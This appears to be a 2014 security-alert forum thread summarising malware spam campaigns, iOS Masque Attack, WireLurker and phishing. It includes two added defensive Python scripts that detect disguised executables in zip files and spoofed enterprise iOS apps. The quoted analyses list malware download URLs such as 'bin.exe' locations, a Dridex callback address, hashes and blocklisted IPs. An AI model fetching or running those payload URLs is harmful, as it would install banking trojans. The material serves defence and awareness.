Current Virus total detections: 5/53*. This 'The Bank INTERAC to Guillaume Gilnaught was accepted' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cf7454645f1116d370dcc1ea979bb31866600c15880f69920ba65cdf941d6ffe/analysis/1415290279/
___

Western Union Payment Confirmation Spam
- http://threattrack.tumblr.com/post/101929253328/western-union-payment-confirmation-spam
Nov 6, 2014 - "Subjects Seen:
WUBS Outgoing Payment Confirmation for SOTR4465838
Typical e-mail details:
... This is an automatically generated response: please do not reply to this e-mail. For enquiries please contact Customer Service.
Attached you will find the Outgoing Payment Confirmation for SOTR4465838. Please confirm all details are correct and notify us immediately if there are any discrepancies.
Thank you for your business!

Malicious File Name and MD5:
9574536_11062014.zip (5ED4C6DE460B2869088C523606415B4B)
9574536_11062014.exe (C8A8F049313D1C67F1BAAF338FE5EDE0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a0c7619e79b0504fac6a4441b0bdf838/tumblr_inline_nemiq798aI1r6pupn.png

Tagged: Western Union, Upatre
___

Apple blocks apps infected with WireLurker malware targeting iPhones and iPads
- http://www.theinquirer.net/inquirer/news/2379822/wirelurker-malware-targeting-iphones-and-ipads-via-mac-os-x
Nov 6, 2014 - "... Palo Alto Networks* discovered the malware threat that targets iPhones and iPads through Apple's Mac OS X operating system, putting an end to the age-old belief that iOS is virus-free. Apple has since responded, and said it has -blocked- third-party apps infected with the malware, which Palo Alto describes as the "biggest in scale" it has ever seen... "As always, we recommend that users download and install software from trusted sources.” Palo Alto discovered the new family of malware dubbed 'WireLurker', which is the first known malware that can attack iOS applications in a similar way to a traditional virus. Palo Alto describes the threat as heralding "a new era in malware attacking Apple's desktop and mobile platforms", and said that the malware is "the biggest in scale we have ever seen". WireLurker can attack iOS devices through Mac OS X using USB, and does so by installing third-party applications on non-jailbroken iPhones through 'enterprise provisioning'. The malware seems to be limited to China at present, where it is targeting devices via the Maiyadi App Store, a third-party Mac app store. WireLurker has been found in -467- OS X apps at Maiyadi, which Palo Alto claims have been downloaded 356,104 times so far... The firm also said that enterprises using Mac computers should ensure that mobile device traffic is routed through a threat prevention system."
* http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
___

Hackers devise new simplified Phishing
- http://www.darkreading.com/attacks-breaches/hackers-devise-new-simplified-phishing-method/d/d-id/1317242
Nov 5, 2014 - "... a more efficient way to get unwary online shoppers to part with their personal data and financial account information. The new technique, dubbed 'Operation Huyao' by the security researchers at Trend Micro* who discovered it, basically lessens the time and effort needed for attackers to mount a phishing campaign while also making such attacks harder to spot... only when the user actually attempts to make a purchase that the proxy program serves up a modified page that walks the victim through a checkout progress designed to extract personal information and payment card or bank account information... the phishers employed various blackhat SEO techniques to ensure that people doing specific product-related searches online were served up with results containing malicious links to the targeted store. Users who clicked on the links were then routed to the department store's website via the malicious proxy... In the first half of 2014 for instance, the median uptime for phishing attacks was 8 hours and 42 minutes, meaning that half of all phishing attackers were active for less than nine, the APWG** has noted... Even so, phishing continues to be a major problem. In the first six months of 2014, the industry group counted more than 123,700 unique phishing attacks which was the highest since the second half of 2009. A total of -756- institutions were specifically targeted in these attacks, the largest number ever during a six-month period. Of these companies -Apple- was the most phished brand."
* http://blog.trendmicro.com/trendlabs-security-intelligence/new-phishing-technique-outfoxes-site-owners-operation-huyao/

** http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___

CVE-2014-1772 – IE vuln analysis
- http://blog.trendmicro.com/trendlabs-security-intelligence/root-cause-analysis-of-cve-2014-1772-an-internet-explorer-use-after-free-vulnerability/
Nov 5, 2014 - "... privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035*... this vulnerability was already patched some time ago... This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better..."
* https://technet.microsoft.com/en-us/library/security/ms14-035.aspx - Critical
Updated: Jun 17, 2014
V1.1 (June 17, 2014): Corrected the severity table and vulnerability information to add CVE-2014-2782 as a vulnerability addressed by this update. This is an informational change only. Customers who have already successfully installed the update do not need to take any action.
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1772 - 9.3 (HIGH)
Last revised: 06/26/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2782 - 9.3 (HIGH)
Last revised: 06/26/2014

:mad: :fear:
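
The 'Fake Bank SPAM – PDF malware' item above describes the recurring trick of a zip attachment whose only member is an .exe with a PDF icon, relying on hidden file extensions. The following is an added example (not code from the forum thread or from the quoted blog) of a mail-gateway style check that inspects archive members instead of trusting the displayed name: it flags executable extensions, document extensions hidden in front of the real one (invoice.pdf.exe), and members whose content starts with the PE "MZ" header despite a harmless-looking extension. The sample zip is constructed in memory for this example; the member names are modelled on the attachment named in the post.

```python
"""Flag disguised executables inside a zip attachment.

Added example, not code from the forum thread or the quoted blog. The zip
built by build_sample_zip() is constructed here; its members mimic the
INTERAC attachment named in the post plus a few other disguises.
"""
import io
import os
import zipfile
from typing import List, Tuple

# Extensions Windows will execute when double-clicked (a defender's short list).
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js",
                   ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".cpl"}
# Extensions an attacker puts in front of the real one so the icon/name looks benign.
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
PE_MAGIC = b"MZ"  # first two bytes of every Windows PE executable


def classify_member(name: str, head: bytes) -> List[str]:
    """Return the reasons a member looks like a disguised executable (empty if none)."""
    base = os.path.basename(name.replace("\\", "/"))
    parts = base.lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    reasons = []
    if ext in EXEC_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
    if len(parts) > 2 and "." + parts[-2] in DOC_EXTENSIONS:
        reasons.append("document extension hidden before real extension")
    if head.startswith(PE_MAGIC) and ext not in EXEC_EXTENSIONS:
        reasons.append("PE header (MZ) but non-executable extension")
    return reasons


def suspicious_members(zip_bytes: bytes) -> List[Tuple[str, List[str]]]:
    """Scan every file in the archive; read only the magic bytes, never the whole member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(PE_MAGIC))  # bounded read: safe against oversized members
            reasons = classify_member(info.filename, head)
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: a zip holding PE stubs under several disguises plus one benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("INTERAC_pmt_11062014_0345875.exe", PE_MAGIC + b"\x00" * 64)
        zf.writestr("invoice.pdf.exe", PE_MAGIC + b"\x00" * 64)
        zf.writestr("statement.pdf", PE_MAGIC + b"\x00" * 64)  # wrong extension, PE inside
        zf.writestr("readme.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in suspicious_members(build_sample_zip()):
        print(f"{member}: {'; '.join(why)}")
```

Reading only the first two bytes of each member keeps the check cheap and avoids inflating a deliberately huge member; a fuller gateway would also cap member counts and nested archives, but the name-versus-content comparison is the part that defeats the icon spoofing the post describes.
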

AplusWebMaster
2014-11-07, 15:10
FYI...

'Dark market' websites seized in U.S., European busts - Silk Road 2.0
- http://www.reuters.com/article/2014/11/07/us-europol-cybersecurity-arrests-idUSKBN0IR0Z120141107
Nov 7, 2014
> http://s4.reutersmedia.net/resources/r/?m=02&d=20141107&t=2&i=989590213&w=580&fh=&fw=&ll=&pl=&r=LYNXMPEAA60EZ
"U.S. and European authorities on Friday announced the seizure of more than 400 secret website addresses and arrests of 16 people in a sweep targeting black markets for drugs and other illegal services. The developments were announced a day after prosecutors in New York unveiled criminal charges against the alleged operator of underground online drug marketplace Silk Road 2.0. U.S. authorities called the global sweep the largest law enforcement action to date against illegal websites operating on the so-called Tor network, which lets users communicate anonymously by masking their IP addresses... Europol, in a statement, said U.S. and European cyber crime units, in a sweep across 18 countries, had netted $1 million worth of Bitcoin, the digital currency, 180,000 euros in cash, silver, gold and narcotics. The more than 400 websites and domains seized on Thursday existed on the Tor network and were used by dozens of online marketplaces where such things as child pornography, guns and murder-for-hire could be purchased, authorities said. Sixteen people operating illegal sites were arrested in addition to the defendant in the Silk Road 2.0 case, Europol added, without specifying the charges... On Thursday, U.S. authorities said they had shut down Silk Road 2.0, a successor website to underground online drugs marketplace Silk Road. Blake Benthall, the alleged operator of Silk Road 2.0, was arrested and charged with -conspiracy- to commit drug trafficking, computer hacking, money laundering and other crimes. Troels Oerting, head of Europol's cybercrime center, said the operation knocked out a significant part of the infrastructure for illegal online drugs and weapons trade in the countries involved... The websites had complete business models, Oerting said, and displayed what they sold, including drugs, weapons, stolen credit cards..."
- http://www.fbi.gov/newyork/press-releases/2014/operator-of-silk-road-2.0-website-charged-in-manhattan-federal-court
___

Fake invoice SPAM - malicious Word macro attachment
- http://blog.dynamoo.com/2014/11/sue-morckage-this-email-contains.html
7 Nov 2014 - "This -fake- invoice spam (all pretending to be from someone called Sue Morckage) comes with a malicious Word macro attachment.
From: Sue Morckage
Date: 7 November 2014 13:10
Subject: inovice 9232088 November
This email contains an invoice file attachment

The number in the subject is random, and attached is a document with the same format name (in this example invoice_9232088.doc). So far I have seen two attachments both with VT detection rates of 4/54 [1] [2]... which contains one of two malicious macros... which then go and download a binary from one of the following locations:
http ://ksiadzrobak .cba .pl/bin.exe > https://www.virustotal.com/en/ip-address/95.211.144.89/information/
http ://heartgate .de/bin.exe > https://www.virustotal.com/en/ip-address/81.169.145.156/information/
This binary gets copied into %TEMP%\AKETVJIJPZE.exe and it has a VirusTotal detection rate of just 1/54*, but so far automated analysis tools... are inconclusive as to what this does, however the payload is likely to be Cridex."
* https://www.virustotal.com/en/file/e479a2b6ef7098403c8e45d0d88be37856bb2301347f989a1708055d94c2227e/analysis/1415369050/

1] https://www.virustotal.com/en/file/7ce09f9a865bc889dd4737c1b3f5073d4512767d68604ea5913b59387f293844/analysis/1415365398/

2] https://www.virustotal.com/en/file/0db27aefbfae00b2658a360ec12445aabf0993fac6750b9c99b12e98bc3ebe4b/analysis/1415368736/

- http://myonlinesecurity.co.uk/sue-morckage-inovice-0394508-november-word-doc-malware/
7 Nov 2014
> https://www.virustotal.com/en/file/6ab64b9e14c7d8ad31794f36153276d8f50310e39e04a82935a573b8a0a982f1/analysis/1415372037/
___

Fake job sites ...
- http://blog.dynamoo.com/2014/11/europejobdayscom-and-other-fake-job.html
7 Nov 2014 - "This tip* from @peterkruse about a spam run pushing -fake- jobs using the domain europejobdays .com caught my eye, especially the mention of the nameservers using the stemcellcounseling.net domain. These -fake- job sites tend not to go alone, and a look at the other domains using the same nameservers comes up with a whole list of related -fake- sites... avoid**. You should be aware that the jobs on offer are actually part of some criminal enterprise such as money laundering or parcel reshipping. You can see a video that explains the parcel reshipping scam and the role of the parcel mule below:
> https://www.youtube.com/watch?v=UbSCXqL1jL4

* https://twitter.com/peterkruse/status/530628073264517120

** (Long list at the dynamoo URL at the top.)
___

Fake Tech Support website infections ...
- https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/
Nov 6, 2014 - "... Many websites that are promoted via ads on search engines or pop ups often turn out to be impostors or crooks and it doesn’t matter whether they are overseas or here in the U.S. This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts their infrastructure as being 'ahead of time technology equipment' while 'your computer issues are fixed securely'. This couldn’t be further from the truth. For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies... While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/blocked-1024x817.png
... One of the html files (a banner) contains a malicious script loading a page from a compromised website. This site contains an -iframe- with a dynamic URL that silently -redirects- the user to the Angler Exploit Kit... In this case, if your system was outdated and you had no security solution, you would have been victim of the fileless infection followed by additional malware... This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected... Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point out errors and ‘hackers’ that have compromised your computer by simply showing the (typical) warnings displayed in the Windows Event Viewer:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/eventviewer-1024x728.png
... here’s the problem: Before browsing to their site and calling them up we had made sure our computer was fully patched. So while the site attempted to exploit our system, it never succeeded. So the technician’s report is completely -bogus- . It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it. Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive... There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine. Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is -not- entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you. For more information on tech support scams and general advice, please check out our Tech Support -Scams- resource page*."
* https://blog.malwarebytes.org/tech-support-scams/

- http://www.symantec.com/connect/blogs/when-tech-support-scams-meet-ransomlock
7 Nov 2014 - "A technical-support phone scam uses Trojan.Ransomlock.AM to lock the user’s computer and trick them into calling a technical help phone number to resolve the issue...
Top ten ransomware detections as of 11-07-14:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%202.png
Fake BSoD lock screen:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%203%20edit.png ..."

- http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam

:mad: :fear:

AplusWebMaster
2014-11-10, 13:08
FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/kate-williams-invoice-6330089-november-word-doc-malware/
10 Nov 2014 - "'invoice 6330089 November' pretending to come from 'Kate Williams' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... Almost all of these malicious word documents appear to be -blank- when opened in protected view mode... The email looks like:

Please find attached your November invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 6330089 Account No 5606330089.
Thanks very much
Kate Williams

10 November 2014 : invoice_6330089.doc - Current Virus total detections: 0/51*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415612495/

- http://blog.dynamoo.com/2014/11/kate-williams-invoice-8798556-november.html
10 Nov 2014 - "... the malware connecting to 84.40.9.34 (Hostway, UK)..."

1] https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415613432/

2] https://www.virustotal.com/en/file/626f380c54d2dde9ea3ae4b77d79a8a2e7ca7af118d726e8ba4c5edaf4d34462/analysis/1415613431/

84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
___

Fake Amazon SPAM - malware-macros
- http://net-security.org/malware_news.php?id=2912
Nov 10, 2014 - "... According to AppRiver* researchers, two distinct malware delivery campaigns impersonating e-commerce giant Amazon are currently hitting inboxes. The first one is directed at UK users, and the company has already quarantined over 600,000 of these messages. The malicious email takes the form of a 'delivery confirmation message' and carries a Word document that supposedly contains the needed information. Unfortunately for those who open the file and have -macros- enabled in Word, the action triggers the installation of a Trojan dropper that downloads additional malware aimed at harvesting login credentials for various online services, including online banking. The second campaign comes in the form of an order confirmation from Amazon .com:
> http://www.net-security.org/images/articles/amazonphish-10112014-big.jpg
... AppRiver* pointed out. Also, this campaign is less intense than the first one - the company has blocked "only" about -160,000- messages so far. The supposed 'invoice file attached' is actually a Trojan dropper that will download additional malware once the host is infected..."
* http://blog.appriver.com/2014/11/malicious-amazon-emails-aim-to-infect-holiday-shoppers
"... This is a very popular time of the year for these types of scams with so many people in shopping mode in preparation for the holidays. With many people expecting purchase confirmations and shipping confirmations with much more frequency, it increases the likelihood that people will fall for this scam. Be extra cautious this holiday shopping season and if you are suspicious of unauthorized activity on your Amazon account -never- follow the link in an email such as this, go directly to the website and check your account from there."
___

'Darkhotel malware' is targeting travelling execs via hotel WiFi
- http://www.theinquirer.net/inquirer/news/2380394/darkhotel-malware-is-targeting-travelling-execs-via-hotel-wifi
Nov 10, 2014 - "... 'Darkhotel' has been targeting travelling executives via hotel WiFi for the past four years, Kaspersky has warned, and is still active today. According to the security firm, 'Darkhotel' infects hotel networks with spying software which in turn infects the computers of targeted executives as soon as they connect to the hotel WiFi network. The executives are tricked into installing the information-stealing malware by disguising it as an update for legitimate software such as Adobe Flash, Google Toolbar or Windows Messenger. The malware then searches the computer for sensitive corporate data, cached passwords and log-in credentials..."
* https://securelist.com/blog/research/66779/the-darkhotel-apt/
Nov 10, 2014
___

Home Depot drops Windows for Mac ...
- http://www.theinquirer.net/inquirer/news/2380340/home-depot-drops-windows-for-mac-os-x-after-data-hack
Nov 10 2014 - "... Home Depot is reportedly shutting out the Windows operating system in favour of the Apple alternative as the firm continues to respond to the catastrophic breach on its systems. The hardware chain has confessed in some detail about the attack on its checkout and sales systems, and admitted to losses of data that affect tens of millions of customers... The Wall Street Journal* has more information on the Home Depot hack..."
* http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282
"... hackers got into its systems last April by stealing a password from a vendor, opening a tiny hole that grew into the biggest retail-credit-card breach on record. On Thursday, the company announced the breach was worse than earlier thought. In addition to the 56 million credit-card accounts that were compromised, Home Depot now says around 53 million customer email addresses were stolen as well..."
___

'All Your iOS Apps Belong to Us' - FireEye
- http://www.fireeye.com/blog/technical/cyber-exploits/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
Nov 10, 2014 - "In July 2014, FireEye mobile security researchers discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here:
> https://www.youtube.com/watch?feature=player_embedded&v=3VEQ-bJUhPw
We notified Apple about this vulnerability on July 26... After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can -replace- authentic apps, such as banking and email apps, using the attacker's malware through the Internet. That means the attacker can steal the user's banking credentials by replacing an authentic banking app with malware that has an identical UI. Surprisingly, the malware can even access the original app's local data, which -wasn't- removed when the original app was replaced. These data may contain cached emails, or even login tokens which the malware can use to log into the user's account directly. We have seen proof that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves... By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from the App Store. Masque Attack has severe security consequences... In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/Untitled1.jpg
... Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer.
-- Mitigations: iOS users can protect themselves from Masque Attacks by following three steps:
- Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization.
- Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker
- When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately..."
Figure 3:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/IMG_0001.jpg

:mad: :fear:
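Added example for the Masque Attack item above, not FireEye's code: a Python check that an MDM or in-house app distribution gateway could run over an .ipa before it is offered to users. It looks for the condition the FireEye write-up describes, an enterprise (in-house) provisioning profile combined with a bundle identifier that belongs to an App Store app already on the fleet, which is exactly the com.google.Gmail / "New Flappy Bird" experiment. The .ipa builder, the Acme profile and the list of App Store bundle ids are constructed for the example; real packages contain a Mach-O binary and a CMS-signed embedded.mobileprovision, from which the XML plist is pulled out by its markers in the same way as here.

```python
import io
import plistlib
import re
import zipfile

# A signed .mobileprovision is a CMS (PKCS#7) blob whose payload is an XML plist;
# pulling the plist out by its markers is the usual shortcut when 'security cms -D'
# is not available on the box doing the checking.
PLIST_RE = re.compile(rb"<\?xml.*?</plist>", re.DOTALL)
INFO_RE = re.compile(r"Payload/[^/]+\.app/Info\.plist")
PROV_RE = re.compile(r"Payload/[^/]+\.app/embedded\.mobileprovision")

# Assumption: bundle ids of App Store apps already installed across the fleet
# (an MDM inventory would supply this). com.google.Gmail is the one FireEye used.
STORE_BUNDLE_IDS = {"com.google.Gmail", "com.facebook.Facebook", "com.apple.mobilesafari"}


def read_ipa(data):
    """Return (Info.plist dict, provisioning profile dict or None) from an .ipa."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        info_name = next((n for n in names if INFO_RE.fullmatch(n)), None)
        if info_name is None:
            raise ValueError("no Payload/*.app/Info.plist in package")
        info = plistlib.loads(z.read(info_name))
        prov = None
        prov_name = next((n for n in names if PROV_RE.fullmatch(n)), None)
        if prov_name is not None:
            m = PLIST_RE.search(z.read(prov_name))
            if m:
                prov = plistlib.loads(m.group(0))
    return info, prov


def assess(ipa_bytes, store_bundle_ids=STORE_BUNDLE_IDS):
    """Return (bundle id, findings). Findings are what a gateway should refuse on."""
    info, prov = read_ipa(ipa_bytes)
    bundle_id = info.get("CFBundleIdentifier", "")
    findings = []
    if prov is None:
        # App Store builds carry no embedded profile, so there is no Masque condition.
        return bundle_id, findings
    if prov.get("ProvisionsAllDevices"):  # in-house (enterprise) distribution profile
        findings.append("enterprise-signed: installs on any device without App Store review")
        if bundle_id in store_bundle_ids:
            findings.append(f"bundle id {bundle_id} collides with an installed App Store app; "
                            "on iOS 7.1.1-8.1.1 installing this replaces it (Masque Attack)")
    # Package sanity check, separate from the Masque condition: the app-id entitlement
    # in the profile should be TEAMID.<bundle id> or a TEAMID.* wildcard.
    app_id = prov.get("Entitlements", {}).get("application-identifier", "")
    _team, _, suffix = app_id.partition(".")
    if suffix not in ("", "*", bundle_id):
        findings.append(f"application-identifier entitlement {app_id} does not match {bundle_id}")
    return bundle_id, findings


# --- constructed samples ------------------------------------------------------
def build_ipa(bundle_id, title, profile):
    """Constructed .ipa: the profile is an XML plist wrapped in filler bytes that
    stand in for the CMS header and signature of a real embedded.mobileprovision."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Payload/Demo.app/Info.plist", plistlib.dumps(
            {"CFBundleIdentifier": bundle_id, "CFBundleDisplayName": title,
             "CFBundleExecutable": "Demo"}))
        if profile is not None:
            z.writestr("Payload/Demo.app/embedded.mobileprovision",
                       b"\x30\x82\x10\x00cms-header-stub" + plistlib.dumps(profile)
                       + b"cms-signature-stub")
    return buf.getvalue()


ENTERPRISE_PROFILE = {  # assumption: shape of an in-house profile, team id made up
    "Name": "Acme In-House Distribution",
    "TeamIdentifier": ["ACME123456"],
    "ProvisionsAllDevices": True,
    "Entitlements": {"application-identifier": "ACME123456.*", "get-task-allow": False},
}

MASQUE_SAMPLE = build_ipa("com.google.Gmail", "New Flappy Bird", ENTERPRISE_PROFILE)
INHOUSE_SAMPLE = build_ipa("com.acme.expenses", "Acme Expenses", ENTERPRISE_PROFILE)
STORE_SAMPLE = build_ipa("com.google.Gmail", "Gmail", None)

if __name__ == "__main__":
    for label, ipa in (("masque", MASQUE_SAMPLE), ("in-house", INHOUSE_SAMPLE), ("store", STORE_SAMPLE)):
        bid, found = assess(ipa)
        print(f"{label:9} {bid:22} {found or ['no findings']}")
```

The collision check is the one that matters for this attack: an enterprise-signed package on its own is normal for a company's internal apps, but an enterprise-signed package whose bundle id is one of the App Store apps your users already have should never be distributed, whatever title it shows on the install pop-up.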

AplusWebMaster
2014-11-11, 14:32
FYI...

Fake 'Bank Payment' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/11/nazarethcarecom-accounts-finchley-bank.html
11 Nov 2014 - "This -fake- invoice spam pretending to be from a care home in the UK comes with a malicious attachment.
From: Accounts Finchley [accounts.finchley@ nazarethcare .com]
Date: 11 November 2014 10:34
Subject: Bank Payments
Good Afternoon,
Paying in sheet attached
Regards
Sandra Whitmore
Care Home Administrator
Nazareth House
162 East End Road
East Finchley
London...
Nazareth Care Charitable Trust...

... The "from" field in an email is trivially easy to fake, and it looks like the body text may have been stolen from a compromised mailbox. Attached is a file 2014_11_07_14_09_19.doc which comes in two versions both with low VirusTotal detection rates [1] [2]. If macros are enabled then one of two macros... which then downloads a file from one of the following locations:
http ://www.grafichepilia .it/js/bin.exe
http ://dhanophan .co.th/js/bin.exe
This file gets copied to %TEMP%\HZLAFFLTDDO.exe and it has a VirusTotal detection rate of 3/53*. The Malwr report shows it phoning home to:
http ://84.40.9.34 /kPm/PQ0Zs8L.Wtg%26/thtqJJSo%2B/LsB6v/
It also drops a DLL identified by VirusTotal** as Dridex."
1] https://www.virustotal.com/en/file/ba33302cdcb892cbc57b502c88775528aefed879d7515d468faea193436e46e9/analysis/1415703941/

2] https://www.virustotal.com/en/file/0a5f29b5ec667d27d1539521514dfb079b58449065df9aefc654fb16f1b83e1d/analysis/1415703952/

* https://www.virustotal.com/en/file/4c6dc38c88226dc461faaa7583ac4e53df822c919de7033428478f803f6d9ea8/analysis/1415704632/

** https://www.virustotal.com/en/file/110f884be52e0ef66f339fa122161f8e4fa66f7cd1f4a412d6ed0cd124d3f915/analysis/1415705610/


- http://myonlinesecurity.co.uk/bank-payments-pretending-come-accounts-finchley-word-doc-malware/
11 Nov 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Accounts-Finchley.png
___

Fake 'Duplicate Payment' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duplicate-payment-received-word-doc-malware/
11 Nov 2014 - "'Duplicate Payment Received' pretending to come from various random names with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £660.94 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Lenora Dunn
Accounts Department

11 November 2014 : De_VY955279R.doc - Current Virus total detections: 2/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e2a53e440bf4b5528d3ddd751b23410f91fa1fd27ef830b3493497c63b89a9bd/analysis/1415704035/

- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-has.html
11 Nov 2014
... Recommended blocklist:
178.254.57.146
213.140.115.29
62.76.180.133
62.76.189.108 "
___

Trojan SMS Found on Google Play
- https://blog.malwarebytes.org/mobile-2/2014/11/trojan-sms-found-on-google-play/
Nov 11, 2014 - "... this one slipped under Google Play’s radar, but an SMS Trojan app with the package name com.FREE_APPS_435.android that claims to be a download for wallpapers, videos, and music is actively on the Google Play store (at least at the time of this writing it was).
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot1.jpg
... This tactic has been seen since malware started appearing on Android devices. If you visit the developer’s website from the link provided on the Google Play page, it takes you to a page with two banners and a couple of links.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ScreenShot3.jpg
... Google Play has been notified of the existence of this SMS Trojan. The last update of this app was August 20th 2013, which was most likely the date it was added to the Play store. Many variants of this Trojan have been seen that are not currently on the Play store. We flag this Trojan and similar variants as Android/Trojan.SMS.Agent. This is proof that Google Play isn’t perfect at alleviating all malware."
___

Predator Pain and Limitless... the Fraud
- http://blog.trendmicro.com/trendlabs-security-intelligence/predator-pain-and-limitless-behind-the-fraud/
